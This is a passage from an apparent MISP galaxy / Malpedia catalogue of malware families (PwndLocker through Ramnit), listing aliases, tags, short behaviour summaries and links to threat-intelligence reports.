PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user’s desktop.

The tag is: misp-galaxy:malpedia="PwndLocker"

PwndLocker is also known as:

ProLock

Table 2442. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker
https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/
https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/
https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf
https://www.intrinsec.com/egregor-prolock/
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/
https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html
https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/
https://www.group-ib.com/blog/prolock
https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.group-ib.com/blog/prolock_evolution
https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/
https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji

pwnpos

The tag is: misp-galaxy:malpedia="pwnpos"

pwnpos is also known as:

Table 2443. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos
https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf
https://twitter.com/physicaldrive0/status/573109512145649664
https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/
https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html

Pykspa

The tag is: misp-galaxy:malpedia="Pykspa"

Pykspa is also known as:

Table 2444. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa
https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html
https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/
https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/
https://www.youtube.com/watch?v=HfSQlC76_s4

PyLocky

PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.

The tag is: misp-galaxy:malpedia="PyLocky"

PyLocky is also known as:

Locky Locker

Table 2445. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky
https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/
https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/
https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/
https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html
https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/
https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/
https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/
https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/

PyXie

Full-featured Python RAT compiled into an executable.

PyXie RAT functionality includes: * Man-in-the-middle (MITM) Interception * Web-injects * Keylogging * Credential harvesting * Network Scanning * Cookie theft * Clearing logs * Recording video * Running arbitrary payloads * Monitoring USB drives and exfiltrating data * WebDav server * Socks5 proxy * Virtual Network Connection (VNC) * Certificate theft * Inventorying software * Enumerating the domain with Sharphound

The tag is: misp-galaxy:malpedia="PyXie"

PyXie is also known as:

PyXie RAT

Table 2446. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://www.secureworks.com/research/threat-profiles/gold-dupont
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

Qaccel

The tag is: misp-galaxy:malpedia="Qaccel"

Qaccel is also known as:

Table 2447. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel

Qadars

The tag is: misp-galaxy:malpedia="Qadars"

Qadars is also known as:

Table 2448. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars
https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://securityintelligence.com/an-analysis-of-the-qadars-trojan/
https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan
https://www.johannesbader.ch/2016/04/the-dga-of-qadars/
https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/

QakBot

QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.

The tag is: misp-galaxy:malpedia="QakBot"

QakBot is also known as:

Pinkslipbot
Qbot
Quakbot

Table 2449. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/
https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/
https://quosecgmbh.github.io/blog/grap_qakbot_strings.html
https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf
https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/
https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf
https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/
https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex
https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf
https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot
https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf
https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/
https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf
https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/
https://twitter.com/ChouchWard/status/1405168040254316547
https://securelist.com/qakbot-technical-analysis/103931/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://twitter.com/alex_il/status/1384094623270727685[https://twitter.com/alex_il/status/1384094623270727685]
https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/
https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html
https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view
https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf
https://isc.sans.edu/diary/rss/26862
https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html
https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf
http://www.secureworks.com/research/threat-profiles/gold-lagoon
https://blog.quosec.net/posts/grap_qakbot_strings/
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/
https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot
https://www.intrinsec.com/egregor-prolock/
https://hatching.io/blog/reversing-qakbot
https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques
https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/
https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html
https://threatresearch.ext.hp.com/detecting-ta551-domains/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs
https://malwareandstuff.com/upnp-messing-up-security-since-years/
https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html
https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7
https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/
https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/
https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/
http://contagiodump.blogspot.com/2010/11/template.html
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html
https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks
https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/
https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917
https://blog.quosec.net/posts/grap_qakbot_navigation/
https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/
https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/
https://twitter.com/redcanary/status/1334224861628039169
https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf
https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware
https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware
https://www.secureworks.com/research/threat-profiles/gold-lagoon
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://twitter.com/elisalem9/status/1381859965875462144
https://www.group-ib.com/blog/egregor
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/
https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/
https://www.youtube.com/watch?v=iB1psRMtlqg
https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/
https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/
https://twitter.com/TheDFIRReport/status/1361331598344478727
https://www.um.edu.mt/library/oar/handle/123456789/76802
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blog.group-ib.com/prometheus-tds
https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/
https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/
https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html
https://www.group-ib.com/blog/prolock_evolution

QHost

The tag is: misp-galaxy:malpedia="QHost"

QHost is also known as:

Tolouge

Table 2450. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost

QtBot

The tag is: misp-galaxy:malpedia="QtBot"

QtBot is also known as:

qtproject

Table 2451. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot
https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/

QuantLoader

The tag is: misp-galaxy:malpedia="QuantLoader"

QuantLoader is also known as:

Table 2452. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader
https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/
https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

Quasar RAT

Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.

The tag is: misp-galaxy:malpedia="Quasar RAT"

Quasar RAT is also known as:

CinaRAT
QuasarRAT
Yggdrasil

Table 2453. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign
https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://securelist.com/apt-trends-report-q1-2021/101967/
https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign
https://www.secureworks.com/research/threat-profiles/aluminum-saratoga
https://twitter.com/malwrhunterteam/status/789153556255342596
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://twitter.com/struppigel/status/1130455143504318466
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://blog.minerva-labs.com/trapping-quasar-rat
https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://blog.malwarelab.pl/posts/venom/
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf
https://blog.ensilo.com/uncovering-new-activity-by-apt10
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
https://blog.reversinglabs.com/blog/rats-in-the-library
https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass
https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/
https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html
https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/
https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html
https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/
https://www.secureworks.com/research/threat-profiles/bronze-riverside
https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite
https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
https://www.antiy.cn/research/notice&report/research_report/20201228.html
http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments
https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

Qulab

Qulab is an AutoIT Malware focusing on stealing & clipping content from victim’s machines.

The tag is: misp-galaxy:malpedia="Qulab"

Qulab is also known as:

Table 2454. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab
https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/

r980

The tag is: misp-galaxy:malpedia="r980"

r980 is also known as:

Table 2455. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.r980
https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/

Raccoon

Raccoon is a stealer and collects "passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies".

The tag is: misp-galaxy:malpedia="Raccoon"

Raccoon is also known as:

Mohazo
RaccoonStealer
Racealer
Racoon

Table 2456. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon
https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d
https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a
https://www.youtube.com/watch?v=5KHZSmBeMps
https://www.riskiq.com/blog/labs/magecart-medialand/
https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html
https://www.group-ib.com/blog/fakesecurity_raccoon
https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/
https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/
https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf
https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d[https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d]
https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949
https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf
https://www.youtube.com/watch?v=1dbepxN2YD8
https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf
https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block
https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/
https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/
https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer

Radamant

The tag is: misp-galaxy:malpedia="Radamant"

Radamant is also known as:

Table 2457. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant

RadRAT

The tag is: misp-galaxy:malpedia="RadRAT"

RadRAT is also known as:

Table 2458. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat
https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

RagnarLocker

The tag is: misp-galaxy:malpedia="RagnarLocker"

RagnarLocker is also known as:

Table 2459. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://seguranca-informatica.pt/ragnar-locker-malware-analysis/
http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html
https://twitter.com/AltShiftPrtScn/status/1403707430765273095
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/
https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/
https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/
https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf
https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/
https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/
https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel
https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://securelist.com/targeted-ransomware-encrypting-data/99255/
https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf

Ragnarok

According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system’s Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.

The tag is: misp-galaxy:malpedia="Ragnarok"

Ragnarok is also known as:

Table 2460. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok
https://news.sophos.com/en-us/2020/05/21/asnarok2/
https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw
https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/

Raindrop

Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.

The tag is: misp-galaxy:malpedia="Raindrop"

Raindrop is also known as:

Table 2461. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop
https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf
https://www.sans.org/webcasts/contrarian-view-solarwinds-119515
https://www.youtube.com/watch?v=GfbxHy6xnbA
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

Rakhni

The tag is: misp-galaxy:malpedia="Rakhni"

Rakhni is also known as:

Table 2462. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni
https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/

Rambo

The tag is: misp-galaxy:malpedia="Rambo"

Rambo is also known as:

brebsd

Table 2463. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo
https://www.secureworks.com/research/threat-profiles/bronze-overbrook
https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html
https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf

Ramdo

The tag is: misp-galaxy:malpedia="Ramdo"

Ramdo is also known as:

Table 2464. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo

Ramnit

The tag is: misp-galaxy:malpedia="Ramnit"

Ramnit is also known as:

Nimnul

Table 2465. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit
https://securelist.com/financial-cyberthreats-in-2020/101638/
http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html
